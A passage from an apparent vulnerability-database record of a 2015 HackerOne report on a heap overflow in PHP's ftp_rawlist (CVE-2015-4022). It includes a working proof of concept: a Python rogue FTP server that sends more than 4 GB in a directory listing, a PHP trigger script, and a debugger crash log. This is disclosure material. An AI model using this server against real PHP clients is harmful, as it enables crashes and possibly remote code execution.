tempfile, which results in a heap overflow at [3] when loading the contents of the\ntempfile back into memory.\n\nThese kind of bugs are well-known to be exploitable and since php_stream_getc uses structs\nlocated on the heap, which may be overwritten, I think that this bug can be leveraged to attain\nremote code execution.\n\nRegards,\nMax Spelsberg\n\n\n```\nmalicious_server.py\n===================\n#!/usr/bin/env python2\n# coding: utf-8\n\n# based on https://gist.github.com/scturtle/1035886\n\nimport os,socket,threading,time\n\nallow_delete = False\nlocal_ip = \"localhost\"\nlocal_port = 8887\ncurrdir=os.path.abspath('.')\n\nclass FTPserverThread(threading.Thread):\n def __init__(self,(conn,addr)):\n self.conn=conn\n self.addr=addr\n self.basewd=currdir\n self.cwd=self.basewd\n self.rest=False\n self.pasv_mode=False\n threading.Thread.__init__(self)\n\n def run(self):\n self.conn.send('220 Welcome!\\r\\n')\n while True:\n cmd=self.conn.recv(256)\n if not cmd: break\n else:\n print 'Recieved:',cmd\n try:\n func=getattr(self,cmd[:4].strip().upper())\n func(cmd)\n except Exception,e:\n print 'ERROR:',e\n #traceback.print_exc()\n self.conn.send('500 Sorry.\\r\\n')\n self.conn.close()\n\n def TYPE(self,cmd):\n self.mode=cmd[5]\n self.conn.send('200 Binary mode.\\r\\n')\n\n def PASV(self,cmd): # from http://goo.gl/3if2U\n self.pasv_mode = True\n self.servsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n self.servsock.bind((local_ip,0))\n self.servsock.listen(1)\n ip, port = self.servsock.getsockname()\n print 'open', ip, port\n self.conn.send('227 Entering Passive Mode (%s,%u,%u).\\r\\n' %\n (','.join(ip.split('.')), port>>8&0xFF, port&0xFF))\n\n def start_datasock(self):\n if self.pasv_mode:\n self.datasock, addr = self.servsock.accept()\n print 'connect:', addr\n else:\n self.datasock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n self.datasock.connect((self.dataAddr,self.dataPort))\n\n def stop_datasock(self):\n self.datasock.close()\n if self.pasv_mode:\n self.servsock.close()\n\n # THIS is the interesting part \n def LIST(self,cmd):\n self.conn.send('150 Here comes the directory listing.\\r\\n')\n print 'list:', self.cwd\n self.start_datasock()\n\n # send 2^32 + 1 bytes of data\n for i in xrange(262144):\n if i % 10000 == 0:\n print \"%d\" % i\n self.datasock.send(\"B\"*16384)\n self.datasock.send(\"A\\r\\n\")\n\n self.stop_datasock()\n self.conn.send('226 Directory send OK.\\r\\n')\n\n\nclass FTPserver(threading.Thread):\n def __init__(self):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sock.bind((local_ip,local_port))\n threading.Thread.__init__(self)\n\n def run(self):\n self.sock.listen(5)\n while True:\n th=FTPserverThread(self.sock.accept())\n th.daemon=True\n th.start()\n\n def stop(self):\n self.sock.close()\n\nif __name__=='__main__':\n ftp=FTPserver()\n ftp.daemon=True\n ftp.start()\n print 'On', local_ip, ':', local_port\n raw_input('Enter to end...\\n')\n ftp.stop()\n```\n\n```\nbuggy.php\n=========\n<?php\n $id = ftp_connect(\"localhost\", 8887);\n ftp_pasv($id, TRUE);\n var_dump(ftp_rawlist($id, \"/\"));\n?>\n```\n\n\n```\nResult\n======\n(lldb) r ./buggy.php\nProcess 54712 launched: '/usr/bin/php' (x86_64)\nProcess 54712 stopped\n* thread #1: tid = 0x204e9, 0x00007fff86503056 libsystem_platform.dylib`_platform_memmove$VARIANT$Unknown + 182, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x1024243de)\n frame #0: 0x00007fff86503056 libsystem_platform.dylib`_platform_memmove$VARIANT$Unknown + 182\nlibsystem_platform.dylib`_platform_memmove$VARIANT$Unknown:\n-> 0x7fff86503056 <+182>: movb (%rsi,%r8), %cl\n 0x7fff8650305a <+186>: movb %cl, (%rdi,%r8)\n 0x7fff8650305e <+190>: subq $0x1, %rdx\n 0x7fff86503062 <+194>: je 0x7fff86503078 ; <+216>\n(lldb) register read rsi\n rsi = 0x00000001024243de\n(lldb) bt\n* thread #1: tid = 0x204e9, 0x00007fff86503056 libsystem_platform.dylib`_platform_memmove$VARIANT$Unknown + 182, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x1024243de)\n * frame #0: 0x00007fff86503056 libsystem_platform.dylib`_platform_memmove$VARIANT$Unknown + 182\n frame #1: 0x000000010031b2c7 php`_php_stream_read + 81\n frame #2: 0x000000010031b8a1 php`_php_stream_getc + 22\n frame #3: 0x000000010010ec3a php`___lldb_unnamed_function2574$$php + 614\n frame #4: 0x000000010010c21c php`___lldb_unnamed_function2530$$php + 118\n frame #5: 0x00000001003cb2af php`___lldb_unnamed_function9391$$php + 1752\n frame #6: 0x00000001003813b0 php`execute_ex + 79\n frame #7: 0x000000010035d592 php`zend_execute_scripts + 482\n frame #8: 0x0000000100308897 php`php_execute_script + 684\n frame #9: 0x00000001003edce0 php`___lldb_unnamed_function9505$$php + 4653\n frame #10: 0x00000001003ec93c php`___lldb_unnamed_function9503$$php + 1408\n frame #11: 0x00007fff8cb8d5c9 libdyld.dylib`start + 1\n(lldb)\n```\n[Note that the first three bytes (42, 43, de) of rsi have been overwritten!]\n", "published": "2015-04-28T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://hackerone.com/reports/73240", "cvelist": ["CVE-2015-4022"], "lastseen": "2018-04-19T17:34:09"}]}}